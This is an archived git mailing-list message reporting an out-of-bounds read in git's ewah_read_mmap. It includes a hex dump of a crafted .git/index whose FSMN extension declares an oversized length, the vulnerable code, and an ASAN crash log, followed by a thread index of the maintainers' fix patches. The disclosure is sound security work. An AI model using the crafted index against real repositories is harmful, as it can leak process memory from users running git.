From: Luat Nguyen <root@l4w.io>
To: git@vger.kernel.org
Subject: security: potential out-of-bound read at ewah_io.c |ewah_read_mmap|
Date: Fri, 15 Jun 2018 06:59:43 +0800 [thread overview]
Message-ID: <2067D731-C415-4D19-8CDA-90D7DC638397@l4w.io> (raw)
Hi folks,
Recently, I’ve found a security issue related to out-of-bound read at function named `ewah_read_mmap`
Assume that, an attacker can put malicious `./git/index` into a repo by somehow.
Since there is lack of check whether the remaining size of `ptr`is equal to `buffer_size` or not.
So the code reads exceed the buffer of `ptr` and reach to higher page. In this case, it is `/lib/x86_64-linux-gnu/ld-2.23.so`.
Leads to infoleak. You can find more details and asan crash below.
# xxd .git/index
00000000: 4449 5243 0000 0002 0000 0000 4653 4d4e DIRC........FSMN
00000010: 0000 0024 0000 0001 1538 2489 c8fc 3616 ...$.....8$...6.
00000020: 0000 0014 0000 0000 0000 2000 4141 .......... .AA
^ evil size here = 0x2000
***** SNIP CODE *****
int ewah_read_mmap(struct ewah_bitmap *self, const void *map, size_t len)
{
…
self->buffer_size = self->alloc_size = get_be32(ptr);
ptr += sizeof(uint32_t);
…
memcpy(self->buffer, ptr, self->buffer_size * sizeof(eword_t));
[memory map]
0x7f990eca3000 0x7f990eca4000 r--p 1000 0 /media/sf_Fuzz/vuln_repo/.git/index <— where `ptr` is placed
0x7f990eca4000 0x7f990eca5000 r--p 1000 25000 /lib/x86_64-linux-gnu/ld-2.23.so <— memcpy will reach here
0x7f990eca5000 0x7f990eca6000 rw-p 1000 26000 /lib/x86_64-linux-gnu/ld-2.23.so <— and here
[ ASAN log ]
root@guest:/media/sf_SHARE/vuln_repo# /media/sf_SHARE/git-master-asan/git status
=================================================================
==4324==ERROR: AddressSanitizer: unknown-crash on address 0x7f6f235b0000 at pc 0x0000004bba79 bp 0x7ffc75e68850 sp 0x7ffc75e68000
READ of size 65536 at 0x7f6f235b0000 thread T0
#0 0x4bba78 in __asan_memcpy /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3
#1 0x8c910e in ewah_read_mmap /media/sf_SHARE/git-master-asan/ewah/ewah_io.c:144:2
#2 0x8e2534 in read_fsmonitor_extension /media/sf_SHARE/git-master-asan/fsmonitor.c:46:8
#3 0xa05862 in read_index_extension /media/sf_SHARE/git-master-asan/read-cache.c:1615:3
#4 0xa046f3 in do_read_index /media/sf_SHARE/git-master-asan/read-cache.c:1872:7
#5 0xa03325 in read_index_from /media/sf_SHARE/git-master-asan/read-cache.c:1913:8
#6 0xa03231 in read_index /media/sf_SHARE/git-master-asan/read-cache.c:1634:9
#7 0x9de5e8 in read_index_preload /media/sf_SHARE/git-master-asan/preload-index.c:119:15
#8 0x566cc6 in cmd_status /media/sf_SHARE/git-master-asan/builtin/commit.c:1358:2
#9 0x4ede8c in run_builtin /media/sf_SHARE/git-master-asan/git.c:417:11
#10 0x4ea939 in handle_builtin /media/sf_SHARE/git-master-asan/git.c:632:8
#11 0x4ed655 in run_argv /media/sf_SHARE/git-master-asan/git.c:684:4
#12 0x4ea037 in cmd_main /media/sf_SHARE/git-master-asan/git.c:761:19
#13 0x759c8b in main /media/sf_SHARE/git-master-asan/common-main.c:45:9
#14 0x7f6f2243382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#15 0x41c268 in _start (/media/sf_SHARE/git-master-asan/git+0x41c268)
Address 0x7f6f235b0000 is a wild pointer.
SUMMARY: AddressSanitizer: unknown-crash /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3 in __asan_memcpy
Shadow bytes around the buggy address:
0x0fee646adfb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fee646adfc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fee646adfd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fee646adfe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fee646adff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fee646ae000:[fe]fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe
0x0fee646ae010: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe
0x0fee646ae020: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe
0x0fee646ae030: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe
0x0fee646ae040: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe
0x0fee646ae050: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4324==ABORTING
root@guest:/media/sf_SHARE/vuln_repo#
Regards,
Luat Nguyen.
next reply other threads:[~2018-06-15 0:16 UTC|newest]
Thread overview: 58+ messages / expand[flat|nested] mbox.gz Atom feed top
2018-06-14 22:59 Luat Nguyen [this message]
2018-06-15 3:28 ` security: potential out-of-bound read at ewah_io.c |ewah_read_mmap| Jeff King
2018-06-15 3:31 ` [PATCH 1/3] ewah_read_mmap: bounds-check mmap reads Jeff King
2018-06-15 9:14 ` SZEDER Gábor
2018-06-15 16:20 ` Junio C Hamano
2018-06-15 17:10 ` SZEDER Gábor
2018-06-15 17:21 ` Jeff King
2018-06-15 19:42 ` Junio C Hamano
2018-06-15 17:05 ` Junio C Hamano
2018-06-15 17:26 ` Jeff King
2018-06-15 19:44 ` Junio C Hamano
2018-06-16 14:35 ` SZEDER Gábor
2018-06-16 19:14 ` Jeff King
2018-06-15 3:31 ` [PATCH 2/3] ewah: drop ewah_deserialize function Jeff King
2018-06-15 3:32 ` [PATCH 3/3] ewah: drop ewah_serialize_native function Jeff King
2018-06-15 13:56 ` Ramsay Jones
2018-06-15 14:07 ` Ramsay Jones
2018-06-15 14:30 ` [PATCH 0/8] Delete unused methods in EWAH bitmap Derrick Stolee
2018-06-15 14:30 ` [PATCH 1/8] ewah/bitmap.c: delete unused 'bitmap_clear()' Derrick Stolee
2018-06-15 14:46 ` Ramsay Jones
2018-06-15 15:11 ` Derrick Stolee
2018-06-15 14:30 ` [PATCH 2/8] ewah/bitmap.c: delete unused 'bitmap_each_bit()' Derrick Stolee
2018-06-15 15:03 ` Ramsay Jones
2018-06-15 14:30 ` [PATCH 3/8] ewah_bitmap: delete unused 'ewah_and()' Derrick Stolee
2018-06-15 14:30 ` [PATCH 4/8] ewah_bitmap: delete unused 'ewah_and_not()' Derrick Stolee
2018-06-15 14:30 ` [PATCH 5/8] ewah_bitmap: delete unused 'ewah_not()' Derrick Stolee
2018-06-15 14:30 ` [PATCH 6/8] ewah_bitmap: delete unused 'ewah_or()' Derrick Stolee
2018-06-15 14:30 ` [PATCH 7/8] ewah_io: delete unused 'ewah_serialize()' Derrick Stolee
2018-06-15 14:30 ` [PATCH 8/8] ewah_io: delete unused 'ewah_serialize_native()' Derrick Stolee
2018-06-15 15:01 ` Ramsay Jones
2018-06-15 15:10 ` Derrick Stolee
2018-06-15 14:35 ` [PATCH 0/8] Delete unused methods in EWAH bitmap Derrick Stolee
2018-06-15 18:27 ` [PATCH v2 0/7] " Derrick Stolee
2018-06-15 18:27 ` [PATCH v2 1/7] ewah/bitmap.c: delete unused 'bitmap_clear()' Derrick Stolee
2018-06-15 18:27 ` [PATCH v2 2/7] ewah/bitmap.c: delete unused 'bitmap_each_bit()' Derrick Stolee
2018-06-15 18:27 ` [PATCH v2 3/7] ewah_bitmap: delete unused 'ewah_and()' Derrick Stolee
2018-06-15 18:27 ` [PATCH v2 4/7] ewah_bitmap: delete unused 'ewah_and_not()' Derrick Stolee
2018-06-15 18:27 ` [PATCH v2 5/7] ewah_bitmap: delete unused 'ewah_not()' Derrick Stolee
2018-06-15 18:27 ` [PATCH v2 6/7] ewah_bitmap: delete unused 'ewah_or()' Derrick Stolee
2018-06-15 18:27 ` [PATCH v2 7/7] ewah_io: delete unused 'ewah_serialize()' Derrick Stolee
2018-06-15 18:51 ` [PATCH v2 0/7] Delete unused methods in EWAH bitmap Junio C Hamano
2018-06-15 18:56 ` Derrick Stolee
2018-06-15 19:48 ` Junio C Hamano
2018-06-15 20:35 ` Jeff King
2018-06-15 14:15 ` [PATCH 3/3] ewah: drop ewah_serialize_native function Derrick Stolee
2018-06-15 17:51 ` Jeff King
2018-06-15 18:33 ` Junio C Hamano
2018-06-15 18:46 ` Jeff King
2018-06-15 3:44 ` [PATCH 4/3] ewah: adjust callers of ewah_read_mmap() Jeff King
2018-06-15 11:23 ` Derrick Stolee
2018-06-15 16:41 ` Junio C Hamano
2018-06-15 17:31 ` Jeff King
2018-06-15 18:23 ` Derrick Stolee
2018-06-15 20:38 ` Jeff King
2018-06-15 17:12 ` Junio C Hamano
2018-06-15 16:11 ` security: potential out-of-bound read at ewah_io.c |ewah_read_mmap| Junio C Hamano
2018-06-19 19:00 ` Dyer, Edwin
2018-06-19 19:56 ` Jeff King
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
List information: http://vger.kernel.org/majordomo-info.html
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=2067D731-C415-4D19-8CDA-90D7DC638397@l4w.io \
--to=root@l4w.io \
--cc=git@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
Code repositories for project(s) associated with this public inbox
https://80x24.org/mirrors/git.git
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).